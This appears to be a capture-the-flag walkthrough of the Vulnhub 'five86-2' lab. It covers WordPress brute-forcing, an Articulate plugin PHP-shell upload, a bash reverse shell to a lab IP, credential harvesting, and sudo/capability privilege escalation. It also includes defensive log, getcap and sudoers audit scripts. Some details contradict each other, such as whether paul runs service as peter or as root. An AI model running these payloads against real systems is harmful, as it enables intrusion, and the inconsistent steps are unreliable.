
Vulnhub is a site that hosts vulnerable machines to help security practitioners hone their offensive security skills. This is the five86-2 Vulnhub walkthrough. It is a hard box and I highly recommend doing it; however, if you have not yet done the first one, do that first.

What is an OSCP-like box?

An OSCP-like box is one you might see on the Offensive Security OSCP exam. It is more realistic in its intended exploitation than boxes that rely on less practical methods such as steganography, cracking complex hash sequences, etc. In a nutshell, it means the box is something you could expect to see in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes. Personally, I find those annoying and prefer OSCP-like boxes in general.

These are the OSCP-related skills you will improve upon by completing this challenge.

  • Linux Privilege Escalation
  • Hacking Web Apps
  • Enumerating WordPress
  • URL-Encoding Payloads
  • Locating Plaintext Credentials On the Target
  • Unprivileged Linux Process Snooping

Here’s What You Need

Recon

Start with an nmap scan. It looks like a few ports are open: TCP 20, 21, and 80.

Upgrade your scan to an AutoRecon scan to get the best results.

nmap -sV -p- 10.0.50.73

wpscan --api-token $YOURKEY --url http://five86-2 -e --plugins-detection aggressive
wpscan --api-token $YOURKEY  --url http://five86-2 -P /usr/share/wordlists/rockyou.txt     

Web Enumeration

So this is the step where other tutorials fall off and leave you hanging. There are some details here that you can easily overlook.

Look at the bottom of the page: there is a hyperlink for five86-2. What does that mean for the next steps?

If you click on the hyperlink it takes you to http://five86-2 in your browser, but it loads as a blank page. To progress here you need to add an entry to your /etc/hosts file. Do so (as root) with echo "10.0.0.9 five86-2" >> /etc/hosts and then try the same URL again. We find out that the page is a WordPress site, which means the next step is WordPress enumeration to look for an exploit we can use.

wpscan --url http://10.0.0.9/ --enumerate p,u --plugins-detection aggressive

Use wpscan to enumerate the users on the site and, with its plugin detection, to look for vulnerable plugins that are installed.

Now that we have users we can use wpscan to brute-force authentication to the wp-admin page by passing it the list of usernames and a password list to try. The password brute force returns two sets of credentials: stephen:apollo1 and barney:spooky1.

How to Exploit WordPress Plugin

Enumerating the WordPress site reveals that a vulnerable plugin is installed: "Insert or Embed Articulate Content into WordPress <= 4.2998 – Authenticated RCE". This could be how we get our first shell on the target. The exploit needs an authenticated user, and once logged in we can use the exploit, which is published on Exploit-DB.

I finally got a shell back to my netcat listener by creating a multi-line PHP shell. The exploit for the vulnerable plugin, https://www.exploit-db.com/exploits/46981, says to put a PHP shell in a zip file and upload it to the target by creating a new post, adding a new e-Learning block, and uploading the zip we created in a local directory as the attachment. Once this is done we can reach the files by browsing to the uploads directory and loading them.

The important take away here is that this is the first exploit we have on the target and now we have remote PHP execution!

# stage 1
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami

# stage 2
bash -c 'bash -i >& /dev/tcp/10.0.50.50/1234 0>&1'
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%62%61%7...

To exploit the vulnerable plugin, follow the instructions I just laid out: create a new post, add a new block selecting the e-Learning module, upload our shell.zip file, and then publish the post.

Next, to execute the PHP shell, visit the URL of the uploaded file. It will be http://five86-2/wp-content/uploads/articulate_uploads/shell/shell.php, and the shell runs as soon as you open that link in your browser.

Before doing so, remember to start a netcat listener on port 1234.

A Note On URL Encoding

In scenarios such as this, where URL-encoding a payload is required, there are several options. However, I find that using Burp Suite is the easiest and most reliable.
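As an added example that is not part of the original walkthrough, here is the defender's side of the same encoded request: a Python script that URL-decodes the query string of web-server access-log lines, flags command-style parameters such as the cmd= calls above, and separately notes PHP being served from the WordPress uploads directory (which should hold static files only). The log lines are constructed samples, not traffic captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style access-log lines (not real traffic from the box).
# Line 2 carries a percent-encoded "cmd" value, as in the walkthrough's stage 2.
SAMPLE_LOG = """\
10.0.50.50 - - [01/Jan/2020:10:00:01 +0000] "GET /wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami HTTP/1.1" 200 12
10.0.50.50 - - [01/Jan/2020:10:00:05 +0000] "GET /wp-content/uploads/articulate_uploads/poc/index.php?cmd=%62%61%73%68%20%2d%63%20%27id%27 HTTP/1.1" 200 40
10.0.50.51 - - [01/Jan/2020:10:00:09 +0000] "GET /?s=hello%20world HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter names that commonly carry an OS command in simple web shells.
SUSPICIOUS_PARAMS = {"cmd", "exec", "command"}
UPLOADS_PREFIX = "/wp-content/uploads/"

def decode_query(target):
    """Map each query parameter to its decoded values. parse_qs decodes once;
    the extra unquote() also surfaces doubly-encoded payloads."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: [unquote(v) for v in vals] for k, vals in params.items()}

def scan_log(text):
    """Return one finding per suspicious parameter value seen in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = urlsplit(m.group("target")).path
        # PHP executing under the uploads tree is itself a misconfiguration:
        # the web server should not run scripts from that directory.
        php_in_uploads = path.startswith(UPLOADS_PREFIX) and path.endswith(".php")
        for param, values in decode_query(m.group("target")).items():
            if param.lower() not in SUSPICIOUS_PARAMS:
                continue
            for value in values:
                findings.append({"client": m.group("client"), "path": path,
                                 "param": param, "value": value,
                                 "php_in_uploads": php_in_uploads})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['path']} {f['param']}={f['value']!r} "
              f"php_in_uploads={f['php_in_uploads']}")
```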

Privilege Escalation

First, upgrade your shell; it makes life easier, and without a fully interactive shell some commands will not run as you expect. Our new user stephen can’t run any commands with sudo, so let’s follow the usual enumeration steps and see which groups he is in. The one that stands out is named pcap. Why is he in that group?

Now that we have a shell on the target it is time to gear up for the next phase, privilege escalation. The first thing to do is upgrade the pseudo shell we currently have to a better one. I have outlined the commands below; I find these reliable, whereas other instructions only work some of the time.

It turns out that there are configuration files with plaintext credentials in them, if we just do a bit of digging. The wp-config file has a username and password for the database that is running locally. Do you remember seeing a database port open on the target during the initial enumeration? Yea me neither.

The interface we want to observe is 6: veth99decf4, which means eth6. I got this from the ip a command, since ifconfig is not installed. That would be too easy, eh? First you have to move to a writable folder; I moved to /var/tmp and that worked.

# upgrade pseudo shell (after the pty spawns, press Ctrl-Z, run the stty line on the attacker side, then fg)
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
# the WordPress config holds the database credentials in plaintext
cat wp-config.php

# abuse the database for new credentials (use the user and password from wp-config.php)
mysql -u dbuser -h localhost -p
show databases;
use wordpressdb;
select * from wp_users;
select user_login, user_pass from wp_users;

Cracking Credentials Hashes

Collecting password hashes and usernames from the database means we can now attempt to crack the hashes. Once we have the passwords in plaintext we can attempt to use them to login to different services on the target. Sometimes it is wise to use captured usernames and passwords interchangeably, you never know which combination will lead to access.

# "hash" is a file holding the user_pass values copied from wp_users
john hash --wordlist=/usr/share/wordlists/rockyou.txt
su stephen
getcap -r / 2>/dev/null

Process Snooping And Getcap Abuse

Another common Linux privilege escalation technique is unprivileged process snooping with pspy. Running pspy shows a process executing ftp -n 172.18.0.10. This is important because, in order to dump packets, we need to target the network interface that carries traffic to this IP address.

Another common check is getcap -r / 2>/dev/null, whose output can reveal file capabilities that can be abused. Here /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip shows up, and stephen can run that binary; if you Google these capabilities you will see that they let us dump packets without being root.
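As an added example that is not part of the original walkthrough, this Python audit script parses getcap -r / output (both the older "path = caps+flags" and the newer "path caps=flags" layout) and ranks each file capability by how much a local user could do with it; the sample output is constructed, with the tcpdump line mirroring the one above, a ping line covered by an allowlist, and a made-up cap_setuid line to show the high-severity case.

```python
import re

# Constructed `getcap -r / 2>/dev/null` output. The tcpdump line mirrors the
# walkthrough; the ping and python3 lines are made up to show the other cases.
SAMPLE_GETCAP = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3 cap_setuid=ep
"""

# Capabilities that let a local user become another user or read any file.
HIGH = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
        "cap_sys_module", "cap_dac_override", "cap_dac_read_search",
        "cap_chown", "cap_fowner"}
# Capabilities that expose data (packet capture) or network control.
MEDIUM = {"cap_net_raw", "cap_net_admin", "cap_net_bind_service"}
# Site-specific allowlist of (binary, capability) pairs that are expected.
EXPECTED = {("/usr/bin/ping", "cap_net_raw")}

# Accepts "path = caps+flags" (older libcap) and "path caps=flags" (newer).
LINE_RE = re.compile(r'^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z_,]+)[=+](?P<flags>[eip]+)$')

def parse_getcap(text):
    """Return (path, [capabilities], flags) for each parsable line."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m.group("path"), m.group("caps").split(","), m.group("flags")))
    return entries

def audit_capabilities(text):
    """Return sorted (severity, path, capability) findings, skipping the allowlist."""
    findings = []
    for path, caps, flags in parse_getcap(text):
        # Inheritable-only sets are not granted on exec unless the caller
        # already holds them, so they are not findings on their own.
        if "e" not in flags and "p" not in flags:
            continue
        for cap in caps:
            if (path, cap) in EXPECTED:
                continue
            severity = "high" if cap in HIGH else "medium" if cap in MEDIUM else "low"
            findings.append((severity, path, cap))
    return sorted(findings)

if __name__ == "__main__":
    for severity, path, cap in audit_capabilities(SAMPLE_GETCAP):
        print(f"[{severity}] {path}: {cap}")
```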

Use that capability to capture traffic on the interface found above and then read the new pcap file. Once the capture is up, look through the pcap for credentials.

It looks like one set of credentials is being passed in cleartext: paul:esomepasswford. Paul is not part of any interesting user groups like stephen is, so this time look at which commands paul can run with sudo privileges.

Paul can run the /usr/sbin/service binary as peter with no password required, nice!

What does that mean exactly? It means the admin of this box allowed the user paul to run the /usr/sbin/service binary as the user peter. Looking at peter, he in turn can run the /usr/bin/passwd binary with sudo without a password. To exploit the passwd binary for privilege escalation, simply change the password of any user, maybe root’s?

Root privilege is gained by exploiting the passwd binary to change the root admin’s password to ‘pwned’. Paul can run /usr/sbin/service as the root user without needing the root password, which means we can spawn a new Bash shell as root and escalate to the final user.
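The paul -> peter -> root chain is exactly the kind of misconfiguration a sudoers review should catch. As an added example that is not part of the original walkthrough, here is a Python script that parses a sudoers fragment (constructed to mirror the chain described above), builds the user-to-runas edges, and reports the shortest chain from a given user to root that only uses binaries which hand over the target user's privileges (service can spawn a shell as the runas user, passwd can reset that user's password).

```python
import re
from collections import deque

# Constructed sudoers fragment mirroring the walkthrough's paul -> peter -> root chain.
SAMPLE_SUDOERS = """\
# comment lines are skipped by the parser
paul     ALL=(peter) NOPASSWD: /usr/sbin/service
peter    ALL=(ALL) NOPASSWD: /usr/bin/passwd
www-data ALL=(root) /usr/bin/systemctl restart apache2
"""

# user HOST=(runas[:group]) [TAG: ...] command
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$')
# Binaries that give the caller the runas user's privileges outright.
PRIVILEGE_GRANTING = {"/usr/sbin/service", "/usr/bin/passwd", "/bin/sh", "/bin/bash"}

def parse_rules(text):
    """Return (user, runas_user, nopasswd, command) for each rule line."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if not (m := RULE_RE.match(line)):
            continue
        runas = m.group("runas").split(":")[0] or "root"   # "(ALL)" and "()" mean root
        runas = "root" if runas == "ALL" else runas
        rules.append((m.group("user"), runas, "NOPASSWD:" in m.group("tags"),
                      m.group("cmd").strip()))
    return rules

def escalation_path(text, start):
    """Breadth-first search over user -> runas edges; return the first chain
    from `start` to root that only uses privilege-granting binaries, else []."""
    rules = parse_rules(text)
    queue, seen = deque([(start, [])]), {start}
    while queue:
        user, path = queue.popleft()
        for u, runas, nopasswd, cmd in rules:
            if u != user or cmd.split()[0] not in PRIVILEGE_GRANTING:
                continue
            step = f"{u} -> {runas} via {cmd}" + (" (NOPASSWD)" if nopasswd else "")
            if runas == "root":
                return path + [step]
            if runas not in seen:
                seen.add(runas)
                queue.append((runas, path + [step]))
    return []
```

Calling escalation_path(SAMPLE_SUDOERS, "paul") returns the two-step chain, while www-data gets an empty list because systemctl with a fixed argument is not in the privilege-granting set.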

There is the captured flag and its contents on display, we did it!
